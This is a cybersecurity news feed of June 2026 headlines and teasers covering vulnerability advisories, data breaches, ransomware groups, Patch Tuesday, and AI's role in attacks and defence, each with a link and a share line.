On June 12, 2026, a second wave emerged, using Bun-based installation paths in some affected packages rather than npm alone. Researchers have now identified multiple packages associated with the campaign, including atomic-lockfile, js-digest, and lockfile-js.
Preliminary analysis suggests the campaign...
https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Max-Severity Ivanti Flaw Exploited 24 Hours After Disclosure
Initial methods suggest attackers had likely mapped out Ivanti's asset landscape upfront and acted quickly once the exploit became public.
https://www.darkreading.com/vulnerabilities-threats/max-severity-ivanti-sentry-flaw-exploited-24-hours
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google can be liable for false AI Overviews, court rules
"AI can make mistakes" isn't a good enough legal defense for defamatory or incorrect AI Overviews, a German court has ruled.
https://www.malwarebytes.com/blog/ai/2026/06/google-can-be-liable-for-false-ai-overviews-court-rules
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Making secret scanning more trustworthy: Reducing false positives at scale
Alerts are more trustworthy and actionable when noise is reduced. See how we improved the verification step with context-aware LLM reasoning.
The post Making secret scanning more trustworthy: Reducing false positives at scale appeared first on The GitHub Blog.
https://github.blog/security/making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8424-1: Ubuntu Kylin Software Center vulnerability
It was discovered that Ubuntu Kylin Software Center incorrectly
handled user-supplied input in its D-Bus service. A local attacker
could possibly use this issue to gain administrative privileges.
https://ubuntu.com/security/notices/USN-8424-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Segmentation Works for OT If Operators Are Paying Attention
Even the best segmentation strategy will fall apart without constant oversight and disciplined operations.
https://www.darkreading.com/cybersecurity-operations/segmentation-works-for-ot-if-operators-are-paying-attention
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Parents: How To Help Your College Students Avoid Roommate Scams
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 11, 2026 – Listen to the podcast Media outlets and cybersecurity industry experts have been warning for the past several years about a persistent scheme that targets college students on Craigslist,
The post Parents: How To Help Your College Students Avoid Roommate Scams appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/parents-how-to-help-your-college-students-avoid-roommate-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Criminal AI-as-a-Service in 2026: How the Underground Market Is Operationalizing Cybercrime
IntroductionThe underground market for criminally oriented generative AI has moved beyond the early hype surrounding 'malicious chatbots.' The gradual integration of AI as a productivity layer within cybercrime operations has become the dominant story, indicating that while the potential for fully autonomous AI hacking systems is possible, attackers are not embracing them as expected. Instead, threat actors are increasingly using AI to accelerate routine, but operationally significant, tasks to scale their operations. Drafting phishing lures, profiling targets, debugging code, generating forged documents, modifying malware, translating victim communications, and processing stolen data at scale were once time-consuming activities that AI has made significantly easier. AI does not replace cybercriminals;...
https://www.rapid7.com/blog/post/tr-criminal-ai-underground-market-operationalizing-cybercrime-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8422-1: Mistral vulnerability
Eduardo Gonzalez Gutierrez and Arnaud Morin discovered that Mistral
did not properly enforce access policies on some API endpoints. An
attacker could possibly execute arbitrary code on a Mistral worker and
possibly extract sensitive data including service credentials from it.
https://ubuntu.com/security/notices/USN-8422-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8421-1: Ironic vulnerabilities
Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic did not
properly validate file paths when handling ISO images. A privileged
authenticated remote user could use this issue to perform path
traversal via a crafted ISO image and overwrite arbitrary files on
the Ironic conductor. (CVE-2026-48681)
Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic did not
properly validate kernel command line parameters. A privileged
authenticated remote user could use this issue to inject
scripts during node boot and possibly execute arbitrary code.
(CVE-2026-46447)
Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic
incorrectly restricted access to custom PXE templates. A privileged
authenticated remote user could use this issue to read arbitrary
sensitive files on the Ironic conductor....
https://ubuntu.com/security/notices/USN-8421-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VRChat says reported data breach never happened
We explain what data was exposed, the potential risks, and the steps you should take now.
https://www.malwarebytes.com/blog/data-breaches/2026/06/data-of-2-4-million-vrchat-users-stolen
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Children’s phones must block nude images by September, UK says
Apple and Google have three months to block nude images on children's phones. They're not allowed to collect any data while they do it.
https://www.malwarebytes.com/blog/family-and-parenting/2026/06/childrens-phones-must-block-nude-images-by-september-uk-says
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
May 2026 Cyber Attacks Statistics
During May 2026 I collected 165 events: Cyber Crime accounted for 73.8% of events, Malware remained the dominant weapon (48.8%) and Information & Communication was hit the most (37.6%)
https://www.hackmageddon.com/2026/06/11/may-2026-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Trust No Skill: Integrity Verification for AI Agent Supply Chains
Protect enterprise AI agents from supply chain risks by auditing third-party skills for hidden vulnerabilities and multi-stage attack chains.
The post Trust No Skill: Integrity Verification for AI Agent Supply Chains appeared first on Unit 42.
https://unit42.paloaltonetworks.com/ai-agent-supply-chain-risks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OceanLotus: From external espionage to domestic targeting
A shift in operational pattern of the infamous Vietnam-aligned APT group
https://www.welivesecurity.com/en/eset-research/oceanlotus-external-espionage-domestic-targeting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Palo Alto Networks PAN-OS GlobalProtect Authentication Bypass
What is the Vulnerability?
CVE-2026-0257 is a high-severity authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS and certain Prisma Access deployments. Successful exploitation allows an unauthenticated remote attacker to bypass security controls and establish unauthorized VPN connections without valid credentials. Palo Alto Networks, Unit 42, Rapid7, and other security researchers have confirmed active exploitation in the wild, prompting inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog.
The vulnerability impacts deployments that use GlobalProtect authentication override cookies in combination with specific certificate configurations. Threat...
https://fortiguard.fortinet.com/threat-signal-report/6461
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Point VPN Authentication Bypass Vulnerability
What is the Vulnerability?
A critical authentication bypass vulnerability, CVE-2026-50751 (CVSS 9.3), is being actively exploited against vulnerable Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol. The flaw allows unauthenticated attackers to bypass user authentication through a certificate validation logic weakness and establish a VPN session without valid credentials. Check Point has confirmed in-the-wild exploitation and released emergency hot fixes for affected products.
Check Point's investigation identified exploitation activity affecting multiple organizations globally. Public reporting indicates that affiliates of the ransomware operation Qilin...
https://fortiguard.fortinet.com/threat-signal-report/6460
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chinese, N. Korean Threat Groups Build on Asia-Pacific Success
North Korea's gross domestic product (GDP) has grown, in part because of the nation's state-sponsored cybercrime groups, which target financial firms and other businesses.
https://www.darkreading.com/cyberattacks-data-breaches/chinese-korean-threat-groups-asia-pacific-success
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
University of Nottingham - 454,635 breached accounts
In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni".
https://haveibeenpwned.com/Breach/UniversityOfNottingham
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CISA Rewrites Federal Patching Requirements for AI Threat Era
The new directive gives federal agencies three days to fix the most dangerous flaws, while less severe issues can be deferred.
https://www.darkreading.com/cyber-risk/cisa-rewrites-federal-patching-requirements-ai-threat-era
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bug Bounty Research Triggers ServiceNow Security Alert
Security research inadvertently led organizations to believe they were being breached through their ServiceNow instances.
https://www.darkreading.com/vulnerabilities-threats/bug-bounty-research-triggers-servicenow-security-alert
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Risk Worries Insurers & Businesses Alike
As companies adopt AI, many insurance firms are explicitly excluding AI risks, while others are forging ahead to create the right framework. What risks can firms reasonably manage?
https://www.darkreading.com/cyber-risk/ai-risk-worries-insurers-businesses-alike
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Free Spotify Premium hacks on social media are spreading infostealers
Cybercriminals are turning TikTok and Instagram Reels into malware delivery platforms, using free software tutorials to spread infostealers.
https://www.malwarebytes.com/blog/news/2026/06/free-spotify-premium-hacks-on-social-media-are-spreading-infostealers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automated Threat Hunting: Turning Threat Intelligence into Executable Hunt Plans
Blake McDermott is Senior Threat Hunter at Rapid7.Every week, threat hunt teams are faced with a steady flow of blogs, advisories, and DFIR reports containing valuable intelligence about adversary behaviors, tactics, techniques, and procedures. The challenge is turning that intelligence into repeatable, behavior-based hunting logic quickly enough to be useful. Indicators of compromise still have value, but they age quickly. Behavioral detections give defenders a better way to look for how attackers operate, rather than relying only on what they leave behind.To help solve this, Rapid7's Internal Security team built an automated threat hunting pipeline that transforms threat intelligence reporting into structured, executable hunt plans. The pipeline uses large language models to extract adversary...
https://www.rapid7.com/blog/post/ai-automated-threat-hunting-turns-threat-intelligence-into-executable-hunt-plans
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Turn specs into evals for any agent with ASSERT
Adaptive Spec-driven Scoring for Evaluation and Regression Testing (ASSERT) is an open-source framework for converting natural language behavior requirements into executable evaluations of AI models and agents.
The post Turn specs into evals for any agent with ASSERT appeared first on Microsoft Security Blog.
https://commandline.microsoft.com/assert-written-intent-executable-evals/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 2, June 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 2, June 2026 Black X Ransomware Attacks on Korean and U.S. Organizations Data from South Korean Education Platform Leaked on BreachForums by Hasan Breach of French Secure Government Messaging Data Discovered on PwnForums
https://asec.ahnlab.com/en/94088/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fable 5 Is Here. The AppSec Problem Hasn't Changed.
https://www.legitsecurity.com/blog/fable-5-is-here-the-appsec-problem-hasnt-changed
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Who Runs the Ransomware Group ‘The Gentlemen?'
A cybercrime group known as The Gentlemen has emerged as the second most active ransomware gang by victim count, rapidly attracting a talented pool of hackers through an aggressive recruitment strategy that promises affiliates 90 percent of any ransom paid by victims. This post examines clues pointing to a real life identity for the administrator of The Gentlemen ransomware group.
https://krebsonsecurity.com/2026/06/who-runs-the-ransomware-group-the-gentlemen/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Book: Cybersecurity for Accounting and Business
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 10, 2026 – Read the book Cybersecurity for Accounting and Business, a new book co-authored by Nancy Bagranoff, Professor at University of Richmond, and Scott R. Boss, Associate Professor at Bentley
The post New Book: Cybersecurity for Accounting and Business appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/new-book-cybersecurity-for-accounting-and-business/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft's biggest-ever Patch Tuesday fixes 206 bugs, including 3 zero-days
June 2026 is the largest Patch Tuesday in history, fixing 206 vulnerabilities and three publicly disclosed zero-days.
https://www.malwarebytes.com/blog/bugs/2026/06/microsofts-biggest-ever-patch-tuesday-fixes-206-bugs-including-3-zero-days
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From SBOMs to AI BOMs: Why SPDX 3.0 Matters
Software bill of materials (SBOM) strategies are rapidly evolving. What began as a way to track open source components for compliance and vulnerability management is quickly expanding into something much larger: a broader effort to understand, secure, and govern modern software supply chains.
https://www.sonatype.com/blog/from-sboms-to-ai-boms-why-spdx-3.0-matters
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
88% of people struggle to tell what’s real online
As AI-generated scams, deepfakes, and impersonation spread, a new Malwarebytes report finds people increasingly unsure what to trust online.
https://www.malwarebytes.com/blog/ai/2026/06/88-of-people-struggle-to-tell-whats-real-online
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry
OverviewOn June 9, 2026, Ivanti published a security advisory for two critical vulnerabilities affecting Ivanti Sentry (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, CVE-2026-10520, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, CVE-2026-10523, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are...
https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unpacking SMB cyber-readiness – and what makes or breaks it
A company that's expecting a cyberattack but hasn't actively prepared for it risks making the hardest decisions at the worst possible moment
https://www.welivesecurity.com/en/business-security/smb-cyber-readiness-what-makes-breaks-it/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Record-Breaking Patch Tuesday for June 2026
Microsoft today released software updates to plug nearly 200 security holes across its Windows operating systems and supported software, a record number of fixes for the company's monthly Patch Tuesday cycle. Nearly three dozen of those bugs earned Microsoft's most dire "critical" rating, and exploit code for at least three of the weaknesses is now publicly available.
https://krebsonsecurity.com/2026/06/a-record-breaking-patch-tuesday-for-june-2026/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility
Unit 42 research examines attack scenarios targeting cloud logging services. Learn how to defend against log manipulation and defense evasion.
The post Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Patch Tuesday - June 2026
Microsoft is publishing 200 vulnerabilities on June 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild for any of these vulnerabilities, and is aware of public disclosure for three. This is similar to last month's Patch Tuesday, however several of last month's vulnerabilities ended up on CISA KEV in the days following their publication. So far this month, Microsoft has provided patches to address 360 browser vulnerabilities, which is an order of magnitude more than has been typical in any given month over the past few years. As usual, browser vulns are not included in the Patch Tuesday count above. Indeed, the vast, and presumably sustained, uptick in the number of browser vulnerabilities has led to Microsoft no longer enumerating Chromium CVEs in the Security Update...
https://www.rapid7.com/blog/post/em-patch-tuesday-june-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reconstructing AI activity in investigations
Learn how to investigate AI activity in Microsoft 365 Copilot and Azure AI services using a structured, telemetry-driven approach. This playbook helps security teams reconstruct events, assess data exposure, and detect potential threats faster.
The post Reconstructing AI activity in investigations appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/09/reconstructing-ai-activity-investigations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Suspected North Korean actors use fake ‘coding assignments' to steal crypto
https://www.proofpoint.com/us/newsroom/news/suspected-north-korean-actors-use-fake-coding-assignments-steal-crypto
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257
We include indicators of activity and mitigations for PAN-OS vulnerability CVE-2026-0257.
The post Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257 appeared first on Unit 42.
https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Meta’s face-recognition code raises new concerns about smart glasses
As smart glasses become more capable, concerns about face recognition, covert recording, and biometric surveillance are growing.
https://www.malwarebytes.com/blog/privacy/2026/06/metas-face-recognition-code-raises-new-concerns-about-smart-glasses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Rapid7 Gains Access To Anthropic's Project Glasswing To Explore Frontier AI For Cybersecurity
Wade Woolwine is Senior Director, Product Security at Rapid7.Rapid7 is excited to join Anthropic's Project Glasswing, which includes access to Claude Mythos Preview, giving our teams the opportunity to explore how frontier AI can support legitimate, internal defensive security workflows led by experienced security practitioners. Anthropic has now expanded Project Glasswing from its initial cohort to a broader group of organizations, underscoring how quickly this conversation is moving from model capability to industry readiness. This access comes at a critical moment for security operations. Attackers are moving faster, attack surfaces are expanding, and fragmented security data makes it harder for teams to correlate context and respond at scale. The industry is entering a period where...
https://www.rapid7.com/blog/post/ai-rapid7-accesses-anthropics-project-glasswing-exploring-frontier-artificial-cybersecurity-intelligence
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2026 CISO Compensation Data: Salaries, Bonuses, Equity
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 9, 2026 – Read the report The 2026 CISO Report from Cybersecurity Ventures in partnership with Sophos examines the latest compensation data for CISOs. According to Glassdoor data, the median annual pay range
The post 2026 CISO Compensation Data: Salaries, Bonuses, Equity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/2026-ciso-compensation-data-salaries-bonuses-equity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Is Offensive Security Keeping Up with the Latest Cyber Attacks?
Security is not a point-in-time exercise. It's a cycle of testing, fixing, and starting over. Organisations that treat it as anything less quickly fall behind. In the last decade, we’ve seen how offensive security practices such as penetration testing, combined with follow-up patching and mitigation strategies, have significantly strengthened defences. For instance, Active Directory hardening, […]
The post Is Offensive Security Keeping Up with the Latest Cyber Attacks? appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/09/is-offensive-security-keeping-up-with-the-latest-cyber-attacks/?utm_source=rss&utm_medium=rss&utm_campaign=is-offensive-security-keeping-up-with-the-latest-cyber-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Filigran uses AI agents to make CTEM practical for overstretched security teams
Filigran has unveiled XTM One, an AI-native orchestration layer designed to automate Continuous Threat Exposure Management (CTEM) workflows, as organisations struggle to keep pace with growing volumes of threat intelligence, vulnerabilities and attack data. The launch reflects a broader challenge facing security teams. While many organisations have invested heavily in threat intelligence, attack surface management […]
The post Filigran uses AI agents to make CTEM practical for overstretched security teams appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/09/filigran-uses-ai-agents-to-make-ctem-practical-for-overstretched-security-teams/?utm_source=rss&utm_medium=rss&utm_campaign=filigran-uses-ai-agents-to-make-ctem-practical-for-overstretched-security-teams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-31 May 2026 Cyber Attacks Timeline
The threat landscape in May H2 2026 was driven by cyber crime and dominated by malware. Exploitation of public-facing app vulnerabilities continued to play an important role, similarly to supply chain attacks.
https://www.hackmageddon.com/2026/06/09/16-31-may-2026-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercriminals: the 'auditors' you never hired
Every organisation gets audited. The question is who does the auditing.
https://www.welivesecurity.com/en/business-security/cybercriminals-auditors-never-hired/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Entra Agent ID from a Security Perspective
AI agents in your Entra ID tenant? They come with new identities, permissions, and fresh attack paths.
Christian Feuchter breaks down Entra Agent ID security, security-relevant capabilities, control paths, abuse scenarios, and how to review your exposure with EntraFalcon.
https://blog.compass-security.com/2026/06/entra-agent-id-from-a-security-perspective/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Improper access control in API endpoints
CVSSv3 Score:
6.2
An improper access control vulnerability [CWE-284] in FortiPortal API endpoints may allow a remote privileged attacker with organization user role to obtain sensitive network configuration data via crafted HTTP requests.
Revised on 2026-06-09 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-140
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Restricted CLI escape using Lua
CVSSv3 Score:
6.0
An Internal Asset Exposed to Unsafe Debug Access Level or State vulnerability [CWE-1244] in FortiOS and FortiProxy may allow an authenticated admin to execute lua scripts via crafted CLI commands.
Revised on 2026-06-09 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-143
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Second-Order OS Command Injection via JSON Input on start vnc feature
CVSSv3 Score:
9.1
An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in FortiSandbox, FortiSandbox Cloud and FortiSandbox PaaS WEB UI may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests.
Revised on 2026-06-09 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-141
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Netlogon Remote Code Execution Vulnerability
What is the Vulnerability?
A critical vulnerability, CVE-2026-41089, affecting the Windows Netlogon service is now being actively exploited in the wild. The vulnerability was patched by Microsoft during the May 2026 Patch Tuesday release and was recently highlighted by the Centre for Cybersecurity Belgium (CCB) after observing active exploitation attempts targeting unpatched systems.
Netlogon is a core Windows service responsible for authentication and secure communication between domain controllers and domain-joined systems. The vulnerability stems from a stack-based buffer overflow within the Netlogon Remote Procedure Call (RPC) interface and allows an unauthenticated attacker to achieve remote code execution against a...
https://fortiguard.fortinet.com/threat-signal-report/6455
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Has Turned Cloud Risk Into a Race and Human Defenders are Losing
Originally published by Skyhawk Security.
Cloud security used to be framed as a posture problem: find the critical vulnerabilities, fix the most severe misconfigurations, and reduce the visible attack surface. That model is no longer enough. The defining change is not that artificial intelligence has created a completely new class of attacks. The change is that AI helps attackers move faster, connect more weak posture findings, and operationalize attack pa...
https://cloudsecurityalliance.org/articles/ai-has-turned-cloud-risk-into-a-race-and-human-defenders-are-losing
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability
What is the Vulnerability?
Cisco has disclosed a critical security vulnerability, CVE-2026-20245, affecting Cisco Catalyst SD-WAN Manager and confirmed that it is being actively exploited in the wild. The vulnerability resides in the platform's command-line interface (CLI) and allows an authenticated attacker with netadmin privileges to execute arbitrary commands as root on the underlying operating system.
According to Cisco, successful exploitation has been observed in real-world attacks and has resulted in unauthorized configuration changes being pushed to managed SD-WAN edge devices. At the time of disclosure, Cisco had not released a software fix or workaround and instead provided indicators of compromise and investigation...
https://fortiguard.fortinet.com/threat-signal-report/6456
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When “Hi, This Is IT” Comes Through Microsoft Teams
Attackers are increasingly targeting collaboration platforms like Microsoft Teams. Learn the risks and key steps to strengthen your organization's security.
The post When “Hi, This Is IT” Comes Through Microsoft Teams appeared first on Unit 42.
https://unit42.paloaltonetworks.com/microsoft-teams-phishing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Financial Services Industry Shifts from AI Adoption to Governance as Autonomous Systems Proliferate, Cloud Security Alliance Survey Finds
As AI systems gain ground in financial sector, limited visibility raises flags about governance and risk management
SEATTLE – June 9, 2026 — A new survey from the Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, found that the financial services sector has moved beyond debating whether to adopt Artificial Intelligence (AI), and is now grappling with how to govern it effectively before autonomy ...
https://cloudsecurityalliance.org/articles/financial-services-industry-shifts-from-ai-adoption-to-governance-as-autonomous-systems-proliferate-cloud-security-alliance-survey-finds
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)
OverviewOn June 8, 2026, Check Point published a security advisory for CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN, Mobile Access, and Spark Firewall products. The vulnerability affects deployments configured to use the deprecated IKEv1 key exchange protocol where gateways accept legacy Remote Access clients and do not require a machine certificate for connections.CVE-2026-50751, classified as improper authentication (CWE-287), has a CVSS score of 9.3. The vulnerability stems from a logic flow weakness in how Remote Access and Mobile Access components validate certificates during IKEv1 key exchange; successful exploitation allows an unauthenticated attacker to establish a VPN session without providing valid credentials. Per the vendor,...
https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI brands as bait: How threat actors are using the AI hype in social engineering
As threat actors operationalize AI to accelerate attacks, they are also leveraging the wider global interest around AI itself as a social engineering lure.
The post AI brands as bait: How threat actors are using the AI hype in social engineering appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/08/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
May 2026 Dark Web Breach Incident Trend Report
Notes the May 2026 Dark Web Breach Incident Trend Report is organized around the major cases of Data Breaches posted on the deep web and dark web forums. due to the nature of the source, some of the information may not be fully verifiable as to whether it is true or not, and is therefore […]
https://asec.ahnlab.com/en/94028/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dark Web Threat Actor Trend Report May 2026
Notes the May 2026 Dark Web Threat Actor Trend Report summarizes the trends of threat actors and hacktivists operating on the deep web and dark web. some statements are not factually verifiable. Major Issues hacktivist activity targeting the South Korean Region was concentrated. some hacktivist groups claimed DDoS attacks against the website of the South […]
https://asec.ahnlab.com/en/94033/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
May 2026 Dark Web Issue Trend Report
Notes the May 2026 Dark Web Issue Trend Report summarizes the Major Issues that occurred on the deep web and dark web. it stated that due to the nature of the sources, some of the information cannot be fully verified for factual accuracy. Major Issues Hasan’s BreachForums experienced a moderator split, with HasanBroker being ousted […]
https://asec.ahnlab.com/en/94034/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mythos Found 10,000 Vulnerabilities. The Bigger Challenge Is Fixing Them
You don't need an AI-scale fortune to be Mythos ready. You need automated, policy-driven remediation that can close the gap between vulnerability discovery and verified fixes. Keep reading for a practical 30-60-90 day playbook to get there.
https://www.sonatype.com/blog/mythos-found-10000-vulnerabilities.-the-bigger-challenge-is-fixing-them
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
WireBadger Malicious Cable Detector For Penetration Testers And Red Teams
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 8, 2026 – WireBadger production information USB technology was designed for convenience and universal compatibility. When a cable or device connects, computers and mobile devices automatically trust and communicate with it
The post WireBadger Malicious Cable Detector For Penetration Testers And Red Teams appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/wirebadger-malicious-cable-detector-for-penetration-testers-and-red-teams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Baker Distributing - 102,935 breached accounts
In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity.
https://haveibeenpwned.com/Breach/BakerDistributing
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI-Powered Penetration Testing with Metasploit
Overview This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks
The post AI-Powered Penetration Testing with Metasploit appeared first on Hacking Articles.
https://www.hackingarticles.in/ai-powered-penetration-testing-with-metasploit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ongoing updates on Copy.fail and variants
Bulletin ID: 2026-030-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/13/2026 10:00 PM PDT
This is an ongoing issue. This bulletin will be updated as more information becomes available.
Description:
AWS is aware of the copy.fail or DirtyFrag class of issues - a set of privilege escalation issues affecting the Linux Kernel. We will update this bulletin as more information becomes available.
Please see below for current patching timelines for affected services related to the Copy.fail kernel issue and all its variants. AWS recommends that customers apply all updates addressing these issues as soon as they are available.
See more details at Security Bulletin (ID: 2026-030-AWS).
https://aws.amazon.com/security/security-bulletins/rss/2026-030-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with AWS-LC: an open-source, general-purpose cryptographic library (CVE-2026-3336, CVE-2026-3337, CVE-2026-3338)
Bulletin ID: 2026-005-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/03/02 14:30 PM PST
Description:
AWS-LC is an open-source, general-purpose cryptographic library. We identified three distinct issues:
- CVE-2026-3336: PKCS7_verify Certificate Chain Validation Bypass in AWS-LC Improper certificate validation in PKCS7_verify() in AWS-LC allows an unauthenticated user to bypass certificate chain verification when processing PKCS7 objects with multiple signers, except the final signer. - CVE-2026-3337: Timing Side-Channel in AES-CCM Tag Verification in AWS-LC Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. - CVE-2026-3338: PKCS7_verify...
https://aws.amazon.com/security/security-bulletins/rss/2026-005-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issues with AWS Research and Engineering Studio (RES)
Bulletin ID: 2026-014-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/06 14:00 PM PDT
Description:
Research and Engineering Studio (RES) on AWS is an open source, web portal design for administrators to create and manage secure cloud-based research and engineering environments. We have identified the following issues with the AWS Research and Engineering Studio (RES).
